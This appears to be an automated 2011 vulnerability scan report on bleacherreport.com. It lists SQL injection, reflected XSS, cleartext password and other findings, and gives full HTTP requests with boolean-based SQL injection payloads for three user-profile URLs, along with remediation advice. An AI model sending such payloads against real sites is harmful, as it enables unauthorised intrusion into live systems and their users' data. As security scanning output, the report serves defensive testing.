XSS, Cross Site Scripting, CWE-79, www.bleacherreport.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Tue Feb 15 10:08:59 CST 2011.


The DORK Report

Loading

1. SQL injection

1.1. http://bleacherreport.com/users/120343-eric-murtaugh [name of an arbitrarily supplied request parameter]

1.2. http://bleacherreport.com/users/331034-adam-fromal [name of an arbitrarily supplied request parameter]

1.3. http://bleacherreport.com/users/403844-vin-getz [User-Agent HTTP header]

2. Cross-site scripting (reflected)

2.1. http://bleacherreport.com/archives/newswires [REST URL parameter 2]

2.2. http://bleacherreport.com/archives/newswires [REST URL parameter 2]

2.3. http://bleacherreport.com/archives/newswires [REST URL parameter 2]

2.4. http://bleacherreport.com/pages/comguidelines [REST URL parameter 2]

2.5. http://bleacherreport.com/pages/comguidelines [REST URL parameter 2]

2.6. http://bleacherreport.com/pages/comguidelines [REST URL parameter 2]

2.7. http://bleacherreport.com/pages/featuredcolumnists [REST URL parameter 2]

2.8. http://bleacherreport.com/pages/featuredcolumnists [REST URL parameter 2]

2.9. http://bleacherreport.com/pages/featuredcolumnists [REST URL parameter 2]

2.10. http://bleacherreport.com/pages/forum [REST URL parameter 2]

2.11. http://bleacherreport.com/pages/forum [REST URL parameter 2]

2.12. http://bleacherreport.com/pages/forum [REST URL parameter 2]

2.13. http://bleacherreport.com/pages/privacy [REST URL parameter 2]

2.14. http://bleacherreport.com/pages/privacy [REST URL parameter 2]

2.15. http://bleacherreport.com/pages/privacy [REST URL parameter 2]

2.16. http://bleacherreport.com/pages/rewards [REST URL parameter 2]

2.17. http://bleacherreport.com/pages/rewards [REST URL parameter 2]

2.18. http://bleacherreport.com/pages/rewards [REST URL parameter 2]

2.19. http://bleacherreport.com/pages/terms [REST URL parameter 2]

2.20. http://bleacherreport.com/pages/terms [REST URL parameter 2]

2.21. http://bleacherreport.com/pages/terms [REST URL parameter 2]

3. Cleartext submission of password

3.1. http://bleacherreport.com/login

3.2. http://bleacherreport.com/signup

4. Password field with autocomplete enabled

4.1. http://bleacherreport.com/login

4.2. http://bleacherreport.com/signup

5. Cross-domain script include

5.1. http://bleacherreport.com/

5.2. http://bleacherreport.com/2011-nfl-draft

5.3. http://bleacherreport.com/2011-nfl-mock-draft

5.4. http://bleacherreport.com/about

5.5. http://bleacherreport.com/advertise

5.6. http://bleacherreport.com/archives

5.7. http://bleacherreport.com/archives/newswires

5.8. http://bleacherreport.com/articles/599610-follow-the-leader-the-top-5-nhl-captains-of-all-time

5.9. http://bleacherreport.com/articles/600732-arsenal-vs-barcelona-the-fans-view-part-2

5.10. http://bleacherreport.com/articles/604763-greatest-moments-in-wag-history

5.11. http://bleacherreport.com/articles/606334-25-bold-post-all-star-break-predictions-for-the-nba

5.12. http://bleacherreport.com/articles/606389-mother-or-all-mocks-the-results-50-nfl-mock-drafts-all-rolled-into-one

5.13. http://bleacherreport.com/articles/606421-new-york-yankees-the-most-underrated-player-at-each-position-in-team-history

5.14. http://bleacherreport.com/articles/607573-sidney-crosby-why-his-concussions-could-make-him-the-new-eric-lindros

5.15. http://bleacherreport.com/articles/607803-fedor-emelianenkos-15-most-captivating-moments-during-his-illustrious-career

5.16. http://bleacherreport.com/articles/607928-brock-lesnar-and-10-fighters-wed-love-to-see-anderson-silva-kick-in-the-face

5.17. http://bleacherreport.com/articles/608252-ronaldos-greatest-career-moments

5.18. http://bleacherreport.com/articles/608255-san-antonio-spurs-nba-trade-rumors-10-minor-trade-ideas-to-keep-lead-in-west

5.19. http://bleacherreport.com/articles/608304-carmelo-anthony-amare-stoudemire-can-the-two-coexist-on-the-new-york-knicks

5.20. http://bleacherreport.com/articles/608405-sec-football-recruiting-is-recruiting-turning-into-a-side-show

5.21. http://bleacherreport.com/articles/608408-mario-lemieux-why-he-spoke-out-and-where-the-nhl-goes-from-here

5.22. http://bleacherreport.com/articles/608428-nba-rankings-which-teams-have-over-and-underachieved-this-season

5.23. http://bleacherreport.com/articles/608517-nfl-free-agency-25-bargain-buys-that-could-make-an-impact-in-2011

5.24. http://bleacherreport.com/articles/608546-nfl-positional-power-ranking-the-top-5-running-backs-after-the-2010-season

5.25. http://bleacherreport.com/articles/608624-ufc-top-5-pound-for-pound-fighters-in-the-world

5.26. http://bleacherreport.com/articles/608707-jimmie-johnson-10-reasons-he-wont-win-another-nascar-sprint-cup-title-in-201

5.27. http://bleacherreport.com/articles/608718-2011-college-football-top-25-predictions-10-best-running-backs-in-the-top-25

5.28. http://bleacherreport.com/articles/608896-listen-to-larry-fitzgerald-kevin-kolb-to-arizona-cardinals-makes-perfect-sense

5.29. http://bleacherreport.com/articles/608975-college-football-predictions-what-will-2011-season-bring-for-top-25-programs

5.30. http://bleacherreport.com/articles/609071-kris-versteeg-headed-to-philadelphia-brain-burke-lands-first-rounder

5.31. http://bleacherreport.com/articles/609142-jadeveon-clowney-deserves-some-time-to-grow-at-south-carolina

5.32. http://bleacherreport.com/articles/609206-hey-hey-hey-albert-haynesworth-keeping-the-police-busy

5.33. http://bleacherreport.com/articles/609211-nfl-power-rankings-the-10-best-former-texas-longhorns-currently-in-the-league

5.34. http://bleacherreport.com/articles/609250-nfl-draft-2011-which-kingdom-will-prince-amukamara-find-himself-in

5.35. http://bleacherreport.com/articles/609299-nfl-draft-2011-examining-the-detroit-lions-1st-round-options

5.36. http://bleacherreport.com/articles/609328-houston-rockets-the-10-biggest-hurdles-between-the-team-and-the-playoffs

5.37. http://bleacherreport.com/articles/609334-portland-trail-blazers-and-the-10-biggest-jekyll-and-hyde-teams-in-the-nba

5.38. http://bleacherreport.com/articles/609380-la-lakers-10-flaws-the-lakers-must-repair-before-becoming-contenders-once-again

5.39. http://bleacherreport.com/articles/609453-2011-ncaa-tournament-finding-a-george-mason-in-a-crowd-of-68

5.40. http://bleacherreport.com/articles/609540-bob-cousy-rajon-rondo-and-the-top-10-guards-in-boston-celtics-history

5.41. http://bleacherreport.com/articles/609576-daytona-500-dale-earnhardt-and-the-most-impressive-victories

5.42. http://bleacherreport.com/articles/609605-does-the-sec-have-the-three-best-football-programs-of-all-time

5.43. http://bleacherreport.com/auto-racing

5.44. http://bleacherreport.com/br-swagger

5.45. http://bleacherreport.com/brett-favre

5.46. http://bleacherreport.com/careers

5.47. http://bleacherreport.com/college-basketball

5.48. http://bleacherreport.com/college-football

5.49. http://bleacherreport.com/contact

5.50. http://bleacherreport.com/golf

5.51. http://bleacherreport.com/local

5.52. http://bleacherreport.com/login

5.53. http://bleacherreport.com/miami-heat

5.54. http://bleacherreport.com/minnesota-vikings

5.55. http://bleacherreport.com/mlb

5.56. http://bleacherreport.com/mma

5.57. http://bleacherreport.com/nascar

5.58. http://bleacherreport.com/nba

5.59. http://bleacherreport.com/nba-trade-rumors

5.60. http://bleacherreport.com/nfl

5.61. http://bleacherreport.com/nhl

5.62. http://bleacherreport.com/pages/comguidelines

5.63. http://bleacherreport.com/pages/featuredcolumnists

5.64. http://bleacherreport.com/pages/forum

5.65. http://bleacherreport.com/pages/privacy

5.66. http://bleacherreport.com/pages/rewards

5.67. http://bleacherreport.com/pages/terms

5.68. http://bleacherreport.com/partners

5.69. http://bleacherreport.com/press-room

5.70. http://bleacherreport.com/pro-wrestling

5.71. http://bleacherreport.com/signup

5.72. http://bleacherreport.com/soccer

5.73. http://bleacherreport.com/team

5.74. http://bleacherreport.com/tennis

5.75. http://bleacherreport.com/tiger-woods

5.76. http://bleacherreport.com/users/120343-eric-murtaugh

5.77. http://bleacherreport.com/users/299610-hank-epton

5.78. http://bleacherreport.com/users/320822-trent-reinsmith

5.79. http://bleacherreport.com/users/331034-adam-fromal

5.80. http://bleacherreport.com/users/347058-andrew-bailey

5.81. http://bleacherreport.com/users/350986-james-schmidt

5.82. http://bleacherreport.com/users/403844-vin-getz

5.83. http://bleacherreport.com/users/41310-kevin-mcgrady

5.84. http://bleacherreport.com/users/413931-chris-sbalcio

5.85. http://bleacherreport.com/users/97803-tony-santorsa

5.86. http://bleacherreport.com/who_should_write_for_br

5.87. http://bleacherreport.com/wi

5.88. http://bleacherreport.com/world-football

6. Email addresses disclosed

6.1. http://bleacherreport.com/advertise

6.2. http://bleacherreport.com/articles/609071-kris-versteeg-headed-to-philadelphia-brain-burke-lands-first-rounder

6.3. http://bleacherreport.com/contact

6.4. http://bleacherreport.com/pages/comguidelines

6.5. http://bleacherreport.com/pages/featuredcolumnists

6.6. http://bleacherreport.com/pages/privacy

6.7. http://bleacherreport.com/pages/terms

6.8. http://bleacherreport.com/partners

6.9. http://bleacherreport.com/press-room

6.10. http://bleacherreport.com/users/299610-hank-epton

6.11. http://bleacherreport.com/users/347058-andrew-bailey

6.12. http://bleacherreport.com/users/350986-james-schmidt

6.13. http://bleacherreport.com/users/41310-kevin-mcgrady

6.14. http://bleacherreport.com/who_should_write_for_br

6.15. http://bleacherreport.com/wi

7. HTML does not specify charset

7.1. http://bleacherreport.com/articles/608599-2011-nfl-draft-five-1st-round-prospects-with-bust-potential

7.2. http://bleacherreport.com/home/deploy

7.3. http://bleacherreport.com/polls/create



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://bleacherreport.com/users/120343-eric-murtaugh [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bleacherreport.com
Path:   /users/120343-eric-murtaugh

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13928983%20or%201%3d1--%20 and 13928983%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /users/120343-eric-murtaugh?113928983%20or%201%3d1--%20=1 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 1737
ETag: "f121ec6ace8bc80dc82467d7c61d9e04"
Date: Tue, 15 Feb 2011 15:57:02 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 100971
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<ul>\n\t\t\t\t<div id=\"facebook_questions\">\n\t\t\t<li class=\"fb-question\" id=\"facebook_full_name_container\">\n\t\t\t\t<p class=\"question\">\n\t\t\t\t\t<label for=\"facebook_user_use_full_name\">Use your full name <strong class=\"full_name\"></strong>&nbsp;on Bleacher Report?</label>\n\t\t\t\t\t<br />\n\t\t\t\t</p>\n\t\t\t\t<p class=\"options\">\n\t\t\t\t\t<input name=\"facebook_user[use_full_name]\" type=\"hidden\" value=\"0\" /><input checked=\"checked\" id=\"facebook_user_use_full_name\" name=\"facebook_user[use_full_name]\" type=\"checkbox\" value=\"1\" />\n\t\t\t\t\t<label for=\"facebook_user_use_full_name\">Yes</label>\n\t\t\t\t</p>\n\t\t\t\t<div class=\"input full-name-edit\" style=\"display:none\">\n\t\t\t\t\t<p>Edit your name for Bleacher Report:</p>\n\t\t\t\t\t<div class=\"fb-first-name\">\n\t\t\t\t\t\t<label for=\"facebook_user_first_name\">First Name <em>(required)</em></label>\n\t\t\t\t\t\t<input class=\"signup_text_input\" id=\"facebook_user_first_name\" name=\"facebook_user[first_name]\" size=\"30\" type=\"text\" />\n\t\t\t\t\t\t\n\t\t\t\t\t</div>\n\t\n\t\t\t\t\t<div class=\"fb-last-name\">\n\t\t\t\t\t\t<label for=\"facebook_user_last_name\">Last Name <em>(required)</em></label>\n\t\t\t\t\t\t<input class=\"signup_text_input\" id=\"facebook_user_last_name\" name=\"facebook_user[last_name]\" size=\"30\" type=\"text\" />\n\t\t\t\t\t\t\n\t\t\t\t\t</div>\n\t\t\t\t</div>\n\t\t\t</li>\n\t\t\t<li class=\"fb-question\">\n\t\t\t\t<p class=\"question\">\n\t\t\t\t\t<img alt=\"Default-user-icon-medium\" class=\"profile_pic\" src=\"http://static.bleacherreport.net/images/default-user-icon-medium.png?1297385679\" />\n\t\t\t\t\t<label for=\"facebook_user_use_profile_pic\">Do you want to use your Facebook profile picture on Bleacher Report?</label>\n\t\t\t\t</p>\n\t\t\t\t<p class=\"options\">\n\t\t\t\t\t<input name=\"facebook_user[use_profile_pic]\" type=\"hidden\" value=\"0\" /><input checked=\"checked\" id=\"facebook_user_use_profile_pic\" name=\"facebook_user[u
...[SNIP]...

Request 2

GET /users/120343-eric-murtaugh?113928983%20or%201%3d2--%20=1 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 705
ETag: "7194b121e2eb06203fd4ffa50766a937"
Date: Tue, 15 Feb 2011 15:57:02 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 102247
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<ul>\n\t\t\t\t\t<li class=\"fb-question\">\n\t\t\t\t<div class=\"input\">\n\t\t\t\t\t\t\t\t\t\t\t<div id=\"facebook_placebo_submit\">\n\t\t\t\t\t\t\t<img alt=\"Submit\" src=\"http://static.bleacherreport.net/images/shared/submit.png?1297385691\" />\n\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t\t<div class=\"fb-first-name\" id=\"fb-email\">\n\t\t\t\t\t\t<p><strong>Email Address</strong></p>\n\t\t\t\t\t\t<input class=\"signup_text_input\" id=\"facebook_user_email\" name=\"facebook_user[email]\" size=\"30\" type=\"text\" />\n\t\t\t\t\t\t<img alt=\"Small\" id=\"facebook_email_indicator\" src=\"http://static.bleacherreport.net/images/shared/spinners/small.gif?1297385691\" style=\"display:none\" />\n\t\t\t\t\t\t\n\t\t\t\t\t</div>\n\t\t\t\t</div>\n\t\t\t\t<div class=\"input\" id=\"facebook_password_container\" style=\"display:none\">\n\t\t\t\t\t<div class=\"fb-first-name notice\">\n\t\t\t\t\t\t<p>This email address matches an existing user profile. Please enter your password to connect your accounts.</p>\n\t\t\t\t\t\t<p><strong>Password</strong></p>\n\t\t\t\t\t\t<input class=\"signup_text_input\" id=\"facebook_user_password\" name=\"facebook_user[password]\" size=\"30\" type=\"password\" />\n\t\t\t\t\t\t\n\t\t\t\t\t</div>\n\t\t\t\t</div>\n\t\t\t</li>\n\t\t\t\t<div id=\"facebook_questions\" style=\"display:none\">\n\t\t\t<li class=\"fb-question\" id=\"facebook_full_name_container\">\n\t\t\t\t<p class=\"question\">\n\t\t\t\t\t<label for=\"facebook_user_use_full_name\">Use your full name <strong class=\"full_name\"></strong>&nbsp;on Bleacher Report?</label>\n\t\t\t\t\t<br />\n\t\t\t\t</p>\n\t\t\t\t<p class=\"options\">\n\t\t\t\t\t<input name=\"facebook_user[use_full_name]\" type=\"hidden\" value=\"0\" /><input checked=\"checked\" id=\"facebook_user_use_full_name\" name=\"facebook_user[use_full_name]\" type=\"checkbox\" value=\"1\" />\n\t\t\t\t\t<label for=\"facebook_user_use_full_name\">Yes</label>\n\t\t\t\t</p>\n\t\t\t\t<div class=\"input full-name-edit\" style=\"display:none\">\n\t\
...[SNIP]...

1.2. http://bleacherreport.com/users/331034-adam-fromal [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bleacherreport.com
Path:   /users/331034-adam-fromal

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /users/331034-adam-fromal?1%20and%201%3d1--%20=1 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 875
ETag: "587fbd1cab43a32050f4307d6468ed16"
Date: Tue, 15 Feb 2011 15:56:59 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 105885
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<img alt="Shashank Bharadwaj" class="fan-photo" rel="original_file_name:" src="http://static.bleacherreport.net/images/defaults/users/photos/crop_71x71.png?1297385689" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/341310-carl-d-carlucci">
                           <img alt="Carl D. Carlucci" class="fan-photo" rel="original_file_name:31109_393325329772_581644772_4159004_6273822_n.jpg" src="http://cdn.bleacherreport.net/images_root/users/photos/000/341/310/31109_393325329772_581644772_4159004_6273822_n_crop_71x71.jpg?1285708772" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/340355-david-solar">
                           <img alt="David Solar" class="fan-photo" rel="original_file_name:Boston_College_s_Reggie_Jackson_Dunks_On_Miami_s_Cyrus_McGowan.jpg" src="http://cdn.bleacherreport.net/images_root/users/photos/000/340/355/Boston_College_s_Reggie_Jackson_Dunks_On_Miami_s_Cyrus_McGowan_crop_71x71.jpg?1281048505" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/340001-jeremy-lookabaugh">
                           <img alt="Jeremy Lookabaugh " class="fan-photo" rel="original_file_name:18153_1301046760786_1068948072_30925653_5956466_n.jpg" src="http://cdn.bleacherreport.net/images_root/users/photos/000/340/001/18153_1301046760786_1068948072_30925653_5956466_n_crop_71x71.jpg?1280553165" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/339981-eric-bowman">
                           <img alt="Eric Bowman" class="fan-photo" rel="original_file_name:me.jpg" src="http://cdn.bleacherreport.net/images_root/users/photos/000/339/981/me_crop_71x71.jpg?1280551186" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/337748-andrew-tolan">
                           <img alt="Andrew Tolan" class="fan-photo" rel="original_file_name:picture" src="http://cdn.bleacherreport.net/images_root/users/photos/000/337/748/picture_crop_71x71.?1281115932" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/337285-dan-welin">
                           <img alt="Dan Welin" class="fan-photo" rel="original_file_name:Derrick_Rose_4.jpg" src="http://cdn.bleacherreport.net/images_ro
...[SNIP]...

Request 2

GET /users/331034-adam-fromal?1%20and%201%3d2--%20=1 HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 1712
ETag: "8144c8bf7c0ded734f6fa9e617c768d2"
Date: Tue, 15 Feb 2011 15:57:01 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 105667
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<img alt="Shashank Bharadwaj" class="fan-photo" rel="original_file_name:" src="http://static.bleacherreport.net/images/defaults/users/photos/crop_71x71.png?1297385679" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/341310-carl-d-carlucci">
                           <img alt="Carl D. Carlucci" class="fan-photo" rel="original_file_name:31109_393325329772_581644772_4159004_6273822_n.jpg" src="http://cdn.bleacherreport.net/images_root/users/photos/000/341/310/31109_393325329772_581644772_4159004_6273822_n_crop_71x71.jpg?1285708772" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/340355-david-solar">
                           <img alt="David Solar" class="fan-photo" rel="original_file_name:Boston_College_s_Reggie_Jackson_Dunks_On_Miami_s_Cyrus_McGowan.jpg" src="http://cdn.bleacherreport.net/images_root/users/photos/000/340/355/Boston_College_s_Reggie_Jackson_Dunks_On_Miami_s_Cyrus_McGowan_crop_71x71.jpg?1281048505" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/340001-jeremy-lookabaugh">
                           <img alt="Jeremy Lookabaugh " class="fan-photo" rel="original_file_name:18153_1301046760786_1068948072_30925653_5956466_n.jpg" src="http://cdn.bleacherreport.net/images_root/users/photos/000/340/001/18153_1301046760786_1068948072_30925653_5956466_n_crop_71x71.jpg?1280553165" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/339981-eric-bowman">
                           <img alt="Eric Bowman" class="fan-photo" rel="original_file_name:me.jpg" src="http://cdn.bleacherreport.net/images_root/users/photos/000/339/981/me_crop_71x71.jpg?1280551186" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/337748-andrew-tolan">
                           <img alt="Andrew Tolan" class="fan-photo" rel="original_file_name:picture" src="http://cdn.bleacherreport.net/images_root/users/photos/000/337/748/picture_crop_71x71.?1281115932" />                        </a>
                   </li>
               
                   <li>
                       <a class="item-selector" href="/users/337285-dan-welin">
                           <img alt="Dan Welin" class="fan-photo" rel="original_file_name:Derrick_Rose_4.jpg" src="http://cdn.bleacherreport.net/images_ro
...[SNIP]...

1.3. http://bleacherreport.com/users/403844-vin-getz [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bleacherreport.com
Path:   /users/403844-vin-getz

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 21406834'%20or%201%3d1--%20 and 21406834'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /users/403844-vin-getz HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)21406834'%20or%201%3d1--%20
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 1181
ETag: "1d18eaf61096051b8f8da5aed207dca2"
Date: Tue, 15 Feb 2011 15:56:59 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 89944
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
<ul>\n\t\t\t\t\t<li class=\"fb-question\">\n\t\t\t\t<div class=\"input\">\n\t\t\t\t\t\t\t\t\t\t\t<div id=\"facebook_placebo_submit\">\n\t\t\t\t\t\t\t<img alt=\"Submit\" src=\"http://static.bleacherreport.net/images/shared/submit.png?1297385682\" />\n\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t\t<div class=\"fb-first-name\" id=\"fb-email\">\n\t\t\t\t\t\t<p><strong>Email Address</strong></p>\n\t\t\t\t\t\t<input class=\"signup_text_input\" id=\"facebook_user_email\" name=\"facebook_user[email]\" size=\"30\" type=\"text\" />\n\t\t\t\t\t\t<img alt=\"Small\" id=\"facebook_email_indicator\" src=\"http://static.bleacherreport.net/images/shared/spinners/small.gif?1297385682\" style=\"display:none\" />\n\t\t\t\t\t\t\n\t\t\t\t\t</div>\n\t\t\t\t</div>\n\t\t\t\t<div class=\"input\" id=\"facebook_password_container\" style=\"display:none\">\n\t\t\t\t\t<div class=\"fb-first-name notice\">\n\t\t\t\t\t\t<p>This email address matches an existing user profile. Please enter your password to connect your accounts.</p>\n\t\t\t\t\t\t<p><strong>Password</strong></p>\n\t\t\t\t\t\t<input class=\"signup_text_input\" id=\"facebook_user_password\" name=\"facebook_user[password]\" size=\"30\" type=\"password\" />\n\t\t\t\t\t\t\n\t\t\t\t\t</div>\n\t\t\t\t</div>\n\t\t\t</li>\n\t\t\t\t<div id=\"facebook_questions\" style=\"display:none\">\n\t\t\t<li class=\"fb-question\" id=\"facebook_full_name_container\">\n\t\t\t\t<p class=\"question\">\n\t\t\t\t\t<label for=\"facebook_user_use_full_name\">Use your full name <strong class=\"full_name\"></strong>&nbsp;on Bleacher Report?</label>\n\t\t\t\t\t<br />\n\t\t\t\t</p>\n\t\t\t\t<p class=\"options\">\n\t\t\t\t\t<input name=\"facebook_user[use_full_name]\" type=\"hidden\" value=\"0\" /><input checked=\"checked\" id=\"facebook_user_use_full_name\" name=\"facebook_user[use_full_name]\" type=\"checkbox\" value=\"1\" />\n\t\t\t\t\t<label for=\"facebook_user_use_full_name\">Yes</label>\n\t\t\t\t</p>\n\t\t\t\t<div class=\"input full-name-edit\" style=\"display:none\">\n\t\
...[SNIP]...

Request 2

GET /users/403844-vin-getz HTTP/1.1
Host: bleacherreport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)21406834'%20or%201%3d2--%20
Connection: close
Cookie: partner_id=; _session_id=cb7453cba282bc07fc254fe28cc2571e;

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
X-Rack-Cache: miss
X-Runtime: 842
ETag: "34d2963b05d136d4b13b97b96c77d468"
Date: Tue, 15 Feb 2011 15:57:00 GMT
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _session_id=cb7453cba282bc07fc254fe28cc2571e; path=/; HttpOnly
Content-Length: 88668
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html>
<html id="bleacherreport-com" class="no-js" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
   <meta charset="utf-8">
   <ti
...[SNIP]...
